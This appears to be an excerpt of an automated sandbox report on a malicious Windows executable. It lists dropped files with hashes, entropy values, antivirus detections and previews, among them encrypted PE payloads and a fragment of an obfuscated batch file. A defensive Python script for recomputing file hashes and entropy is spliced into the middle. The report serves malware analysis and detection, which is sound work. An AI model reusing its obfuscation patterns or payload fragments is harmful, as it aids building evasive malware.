SHA-256: 844F480D267DBC4AC97DE026FEA4AFD4B4D9A44EF3EDDD1BFF2C64727843ACDF
SHA-512: CC2CA1681BCE3644C31003D01939187ECFD544CD9F2A3A5D13A6B83AF039233A39AF8403BCFD4B1309CA6D18674FDAAB3B6A07950B131F76B5E4E50ED0E3A4D1
Malicious: false
                                                                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.1.4.0.<./.P.i.
Process: C:\Windows\System32\WerFault.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 4829
Entropy (8bit): 4.447757184787239
Encrypted: false
SSDEEP: 48:cvIwWl8zsbBJg771I9CdOOWpW8VYpYm8M4JmvM6F4yq8vVvMM7x4dg5Ld:uIjfXI7NdOv7VJJuMbWxMqx4yZd
MD5: 446E17FC00C392F489512A5A82B6D2BB
SHA1: 1D1A652E791B7CFD26E81AF3D3BE776506111518
SHA-256: 20713EB656AD157499AB85385D6F0BB1E6412639F3697785AD450B109366E12D
SHA-512: 16AE681818149A40A4C0C03AD9E7829C9691CA0C4F10E260C5F83B8390FA3CF117DF2DCD71146683B0432D54EA40491DA519395C2D33AD6AED80382AA92561A0
Malicious: false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="533606" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
Process: C:\Windows\System32\svchost.exe
File Type: XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category: dropped
Size (bytes): 999
Entropy (8bit): 4.966299883488245
Encrypted: false
SSDEEP: 24:Jd4T7gw4TchTGBLtKEHcHGuDyeHRuDye6MGFiP6euDyRtz:34T53VGLv8HGuDyeHRuDye6MGFiP6euy
MD5: 24567B9212F806F6E3E27CDEB07728C0
SHA1: 371AE77042FFF52327BF4B929495D5603404107D
SHA-256: 82F352AD3C9B3E58ECD3207EDC38D5F01B14D968DA908406BD60FD93230B69F6
SHA-512: 5D5E65FCD9061DADC760C9B3124547F2BABEB49FD56A2FD2FE2AD2211A1CB15436DB24308A0B5A87DA24EC6AB2A9B0C5242D828BE85BD1B2683F9468CE310904
Malicious: false
                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<software_identification_tag xmlns="http://standards.iso.org/iso/19770/-2/2009/schema.xsd">...<entitlement_required_indicator>true</entitlement_required_indicator>...<product_title>Windows 10 Pro</product_title>...<product_version>....<name>10.0.19041.1865</name>....<numeric>.....<major>10</major>.....<minor>0</minor>.....<build>19041</build>.....<review>1865</review>....</numeric>...</product_version>...<software_creator>....<name>Microsoft Corporation</name>....<regid>regid.1991-06.com.microsoft</regid>...</software_creator>...<software_licensor>....<name>Microsoft Corporation</name>....<regid>regid.1991-06.com.microsoft</regid>...</software_licensor>...<software_id>....<unique_id>Windows-10-Pro</unique_id>....<tag_creator_regid>regid.1991-06.com.microsoft</tag_creator_regid>...</software_id>...<tag_creator>....<name>Microsoft Corporation</name>....<regid>regid.1991-06.com.microsoft</regid>...</tag_creator>..</software_identification_tag>..
                                                                                                                                                        Process:C:\Windows\System32\conhost.exe
                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):539
                                                                                                                                                        Entropy (8bit):5.356620128167825
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12:Q3La/KDLI4MWuPXcp1WzAbDLI4MNepQZaDAWDLI4MWuCv:ML9E4KQMsXE4Np/E4Ks
                                                                                                                                                        MD5:7155C0B26CEC4BA9E8198691F0343F69
                                                                                                                                                        SHA1:0C2D3811CBDA0C349203F9AAAEEF47E6DB4C0FEF
                                                                                                                                                        SHA-256:59691880D1C39E4698FA89EFDA67A8EA171A039B0F6FC332EBE911F7EE790E23
                                                                                                                                                        SHA-512:62A480C5AD8A978E41D29B6C03666D30569A0A7A1F8D92DA201CE839FE4578782EAEF5EF4B675306668F5813B71F2467B52AE090BDCF5313C276631DBD6E9379
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..2,"System.IO.Compression, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                                                                                        Process:C:\Users\user\Desktop\e7WMhx18XN.exe
                                                                                                                                                        File Type:CSV text
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):425
                                                                                                                                                        Entropy (8bit):5.357964438493834
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khav:ML9E4KQwKDE4KGKZI6Khk
                                                                                                                                                        MD5:D8F8A79B5C09FCB6F44E8CFFF11BF7CA
                                                                                                                                                        SHA1:669AFE705130C81BFEFECD7CC216E6E10E72CB81
                                                                                                                                                        SHA-256:91B010B5C9F022F3449F161425F757B276021F63B024E8D8ED05476509A6D406
                                                                                                                                                        SHA-512:C95CB5FC32843F555EFA7CCA5758B115ACFA365A6EEB3333633A61CA50A90FEFAB9B554C3776FFFEA860FEF4BF47A6103AFECF3654C780287158E2DBB8137767
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):9713
                                                                                                                                                        Entropy (8bit):4.940954773740904
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smu9:9rib4ZIkjh4iUxsNYW6Ypib47
                                                                                                                                                        MD5:BA7C69EBE30EC7DA697D2772E36A746D
                                                                                                                                                        SHA1:DA93AC7ADC6DE8CFFED4178E1F98F0D0590EA359
                                                                                                                                                        SHA-256:CFCE399DF5BE3266219AA12FB6890C6EEFDA46D6279A0DD90E82A970149C5639
                                                                                                                                                        SHA-512:E0AFE4DF389A060EFDACF5E78BA6419CECDFC674AA5F201C458D517C20CB50B70CD8A4EB23B18C0645BDC7E9F326CCC668E8BADE803DED41FCDA2AE1650B31E8
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):2916
                                                                                                                                                        Entropy (8bit):5.4591212444106185
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:48:4wAzsSU4y4RQmFoUL5a+m9qr9t5/78NfpH4GxJZKaVEouYAgwd64rHLjtv2:jAzlHyIFKEg9qrh7KfpRJ5Eo9Adrx2
                                                                                                                                                        MD5:FCDF15235C353AA601AB8C5EC54185CA
                                                                                                                                                        SHA1:6662054154C423B42D43CA7A7327D6C2934742C8
                                                                                                                                                        SHA-256:A2C8FC4F7F8505F51C72F4D48F6DD962A4E77CDD3EED353DAE78C1364B7EF75D
                                                                                                                                                        SHA-512:7628BFC845AE4D618EE4E2930EB47F28936FB5112D5AC7C4F8610087AA58D973FD1A7F4AD38F2AD09AAF1C46D9E74EFC97136CDD358667B8A4FD038EE7782BB6
                                                                                                                                                        Malicious:false
Process:C:\Users\user\Desktop\e7WMhx18XN.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):11776
Entropy (8bit):4.896940708816314
Encrypted:false
SSDEEP:192:QXEmo++SLNbeeHGaH4/1LSRa53Q5tfMcpQdA:QXRo++SLFdX4lsa53FA
MD5:9EB62648C9CC2F1EDD3E9CEF736F9C5C
SHA1:6DDD252A86F1184C57F6C3624A36543DDE0E9FBC
SHA-256:991A39A81F86DA3EE222E4832EDFBEB6A2B9AC182243E868D34094669CFF3971
SHA-512:0F0A3B29384DC557D5EFA20D801159BA495AE63399FF3AF925BB4B099B1855FE3ACFB782871C2B50FC68032AD6CF70F307E87DC34321F1BE408C7C041D409E92
Malicious:true
Process:C:\Users\user\Desktop\e7WMhx18XN.exe
File Type:MSVC program database ver 7.00, 4096*145 bytes
Category:dropped
Size (bytes):593920
Entropy (8bit):4.493232891296652
Encrypted:false
SSDEEP:6144:/7kehBikNGfD4nJt4A4nZARt4C4tk4n/LC4njXyCfhUswqLRp2/+2mpC8oTUtCm3:bznk+lkGvb62erFQLE+F9A
MD5:E8AA35340F0F52F080B13C3316DBD229
SHA1:458E9F4826C812B5F093CB4C49815AE1F428D7CF
SHA-256:E9FDD65F028BC2A77BE5D286B91405B3C55FB3A9346B8CC0FFD259FD7AF68DB1
SHA-512:67B310C050BD5A5CEBA586E46AE6C3C21FF8046943926DA89F5F6C745DFD897DF15510E935BD46A19A2A4A3769E464D68B2C5E62403D4F3A868335EA8A674452
Malicious:false
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                        Process:C:\Users\user\Desktop\e7WMhx18XN.exe
                                                                                                                                                        File Type:DOS batch file, ASCII text, with very long lines (5582), with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):5235000
                                                                                                                                                        Entropy (8bit):6.0073843628876284
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:MlmdAvbhv4H9a3Ibr4dk/nWWwzWjOkGa0KICsmqTulEplv7py:T
                                                                                                                                                        MD5:21986423B4FADCE84294B0357B589099
                                                                                                                                                        SHA1:3009CF439A166ED1E44AD5D67E42626D7998B3D0
                                                                                                                                                        SHA-256:A420A6A98959A1FF28F81054E0A04C1E9E95361D9CEBF2F92FDACD9B3A8709A6
                                                                                                                                                        SHA-512:0CBC3255BA1760D0D6FAAA116B36C2EFD5A74E69F0E362AC3D82EBFF6FAE46B8E63137557ADEB7F80BB56FF8E823C903A0D41058A430AE461108FEBE78DFE0E9
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:@echo off..%^%@%JeXxkwhVwIaGfhusFhDqicMcbyWrrMiIExlDzGeJRZPuBlWLlaNVUpOHsUvMzQEKzrbHWQSYcTyjmsBQBkfqYnOpJElFksjaufUjkoPuiOSaQFuZtFkpKoLmDMYrEnNKJyOhxrFnuLhkuNzeklmFhUqgtIGxpyPUahrsQmCbZWUYgBRPnUgsbiCOiHOOKiXWWmkmwgnYJkGlaraSRR%%^%e%vrwTSEDkixOrQYYcTrEtgGiJQBrOQHWXSYCEAtsHTWfAUTQmcohBmydOjMdqnOtABRySvtCAYWAjBHOXLeMCAvKuVOvNpbueDEYduXQIMGCpYTmBXfFicQaggdWHYOkXCvGXJLCNndPTSv%%^%c%bCTPkwlcMDSXqajKXwEMCnoSmCRUYbgnLHVeeYZBrtTtQOmMetRxnITOnbDHEqdLwElJffFZwdvjtUbyqfQFjJZdOgQdvsWaqhXmCCGYNSakmKutZerzzxCMEiUZoBDehvSmXPVNySSqJPReLxeqaxASFkHuIHKloWc%%^%h%RivkiDbHFldPqQnRxndKVaHNhBfQhGbMMamDbUhxvSntgRdRuSObSsVRBIcHxkzYkqcqDJPDfFocMnGpxowpSaUufvctSzZlsojQPNnKdkVneSenbMkjNkgjwIkhHvLFGcKxeQAJaMlHeGqmrOrfpQxhiZtgCfcIzqHbhHillAibZyfPsXQTdFpPFDofwtgUJDhNZo%%^%o%JGgUPHwhJTEOFojEUaRvEsdPRtnrwrrPdShmXLAijvElSFBGAYnNiTzrDrcvteLsBOLMhWGjzImjNRWmSHQxdEHksPJGJfPeJmKeUPyErenzGqDLuPDLnopXgBtrmazuThABh%%^% %scjmfZqhDclYlTBdRuWMXswgsrESGzPcECwACbjpGZXqgoPGTQqgEuUZGcUOuxBenjtIwaBQkGgXvgadBXZQiJxkIwUzgvUiyTcWVhjSoAVX
                                                                                                                                                        Process:C:\Users\user\Desktop\e7WMhx18XN.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):2234368
                                                                                                                                                        Entropy (8bit):7.999668641098463
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:49152:RR7ODqfbvxzT97xYnP2ZHMv/KXm6O0s8n5AGbHz03WJmE:RR7OgbvtT97EaHMvC1O0ZlbI3jE
                                                                                                                                                        MD5:9CA610EB2F785C8D2DDF2A50347039ED
                                                                                                                                                        SHA1:DB44EDA1468EE8FAC51C88BC0D3298826CB22DC5
                                                                                                                                                        SHA-256:0404B99E5DF31AB12B2ABDB9AA805E1ADEF3936B8A0B234F601E5AEE11289655
                                                                                                                                                        SHA-512:864A98A7E7F69B4945D424A0C6B3AB43E3292E1783392A398C175A7CA34F32E97AAACAF0DB1913A80FE67353E385A7C2FDF01389BDA7E12A5DD8C248CD472BB5
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./...........!......"........@..............................P"......".....................................................0)".<............@".....................................................................l)"..............................text............................... ..`.rdata..n.!..0....!.................@..@.bss.........0"..........................pdata.......@".......".............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Windows\System32\conhost.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):2234368
                                                                                                                                                        Entropy (8bit):7.999668641098463
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:49152:RR7ODqfbvxzT97xYnP2ZHMv/KXm6O0s8n5AGbHz03WJmE:RR7OgbvtT97EaHMvC1O0ZlbI3jE
                                                                                                                                                        MD5:9CA610EB2F785C8D2DDF2A50347039ED
                                                                                                                                                        SHA1:DB44EDA1468EE8FAC51C88BC0D3298826CB22DC5
                                                                                                                                                        SHA-256:0404B99E5DF31AB12B2ABDB9AA805E1ADEF3936B8A0B234F601E5AEE11289655
                                                                                                                                                        SHA-512:864A98A7E7F69B4945D424A0C6B3AB43E3292E1783392A398C175A7CA34F32E97AAACAF0DB1913A80FE67353E385A7C2FDF01389BDA7E12A5DD8C248CD472BB5
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./...........!......"........@..............................P"......".....................................................0)".<............@".....................................................................l)"..............................text............................... ..`.rdata..n.!..0....!.................@..@.bss.........0"..........................pdata.......@".......".............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................
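The per-file fields above (Size, Entropy (8bit), MD5/SHA1/SHA-256/SHA-512, and the Encrypted flag, which in these records is set only for the near-maximal 7.9997 value; the threshold itself is not stated on the page) are what an analyst recomputes when a file recovered from a host has to be matched against the report. The following is an added example, not Joe Sandbox's own code: it recomputes those fields with the standard library (ssdeep is left out because it needs a third-party library) and reports which fields disagree. The byte strings it is run on are constructed test input, not the dropped files from this report.

```python
"""Recompute sandbox-report file fields and compare them against a report."""
import hashlib
import math
from collections import Counter


def shannon_entropy_8bit(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for constant data, 8.0 for a
    uniform byte distribution. This is the quantity the report prints as
    'Entropy (8bit)'; packed or encrypted payloads sit close to 8."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def fingerprint(data: bytes) -> dict:
    """Compute the same fields the report lists for a dropped file.
    Hex digests are upper-cased to match the report's presentation."""
    return {
        "size": len(data),
        "entropy": shannon_entropy_8bit(data),
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "sha512": hashlib.sha512(data).hexdigest().upper(),
    }


def matches_report(data: bytes, expected: dict, entropy_tol: float = 1e-6) -> list:
    """Return the names of the fields that disagree with `expected`
    (an empty list means the file matches). Hashes are compared
    case-insensitively; entropy with a tolerance, since reports print a
    rounded float; size as an integer."""
    got = fingerprint(data)
    mismatched = []
    for field, value in expected.items():
        if field == "entropy":
            if abs(got["entropy"] - float(value)) > entropy_tol:
                mismatched.append(field)
        elif field == "size":
            if got["size"] != int(value):
                mismatched.append(field)
        elif str(got[field]).upper() != str(value).upper():
            mismatched.append(field)
    return mismatched


if __name__ == "__main__":
    # Constructed input (not a file from the report): every byte value
    # appears equally often, so the entropy is the 8.0 maximum.
    uniform = bytes(range(256)) * 16
    print(fingerprint(uniform))
    # A report entry (constructed) with a wrong size is flagged.
    print(matches_report(uniform, {"size": 4096, "entropy": 8.0}))
```

Run it against the file you pulled from the host with `fingerprint(open(path, "rb").read())` and feed the report's values into `matches_report`; a non-empty list means you are not holding the artifact the report describes (different build, truncated copy, or post-drop modification).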
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:modified
                                                                                                                                                        Size (bytes):416
                                                                                                                                                        Entropy (8bit):7.52741317979437
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12:dqvmX4ypYqLv5f9GrvGXU0lZIGfzX6f8lA:umXJW85f9qYU0TI2LO8lA
                                                                                                                                                        MD5:240D48F60FA5303114842C37E3D6D6FA
                                                                                                                                                        SHA1:FDFD7E4CA72B657F9803E5616DED01585A21473B
                                                                                                                                                        SHA-256:4EE0C45C600ECE689EE8016F64134FBA593BA663189CB386045C2A88F891EA51
                                                                                                                                                        SHA-512:80B50CD70CE378B6479C63817B16387F8E4CFCCBBB2C958051F119306953A3A124DE7103661C585BC9E56F3B2E5ADDF040BCD098BE2D72448A8650A486FA3D7D
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:.../..SXM?..3.W.*...qo..r....H.}1....89.i...V67.`.{.....uMz.b....9...V...~.C3.\....I.n..f.Q..;.y,hd.w&a..[I@..H.5.*bV...Fv..y..............1.Ul\J.H...ZU..!....h'..j.D."d...w.h.=m=......z...0........ ..>.......M]n.Yy....H......T...op......xpWG-r.._,.TM.......l.A_...(CQ...o!B........H.g>&-..,....kN.V<t@^...p..?.:./..j '... .3...l...g...`$.jY.,..#.t..K.5...C...p;..>h..k*.k...V.Gr!.S...q.m.C...
                                                                                                                                                        Process:C:\Windows\System32\conhost.exe
                                                                                                                                                        File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):14544
                                                                                                                                                        Entropy (8bit):6.2660301556221185
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                                                                                                        MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                                                                                                        SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                                                                                                        SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                                                                                                        SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                         • Filename: GcqJPBLD2Q.exe, Detection: malicious
                                                                                                                                                         • Filename: C5Lg2JSPlD.exe, Detection: malicious
                                                                                                                                                         • Filename: TwrhjEKqxk.exe, Detection: malicious
                                                                                                                                                         • Filename: aA45th2ixY.exe, Detection: malicious
                                                                                                                                                         • Filename: 1mqzOM6eok.exe, Detection: malicious
                                                                                                                                                         • Filename: updater.exe, Detection: malicious
                                                                                                                                                         • Filename: 7QiAmg58Jk.exe, Detection: malicious
                                                                                                                                                         • Filename: LnK0dS8jcA.exe, Detection: malicious
                                                                                                                                                         • Filename: file.exe, Detection: malicious
                                                                                                                                                         • Filename: SecuriteInfo.com.Win64.Evo-gen.13032.15171.exe, Detection: malicious
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Windows\System32\conhost.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):31232
                                                                                                                                                        Entropy (8bit):7.570601203863118
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:cBTkmACK5dUVInkbmV4HxueiFK9RXmnGQ5bIiox+H9F4IlCfhpGlq4BmY1NGvmJd:/H5V/qR2nGQ5bkC7lq4BNqmJr
                                                                                                                                                        MD5:61D09675A406E39F17F2EA03A3CB8CCC
                                                                                                                                                        SHA1:ED3B8E75D6FA0B61A3E18BD308F61647A7ABE161
                                                                                                                                                        SHA-256:43702440B1CB03293360D7012333845039B807B50C6F187C9E6CCDAD1D65DA89
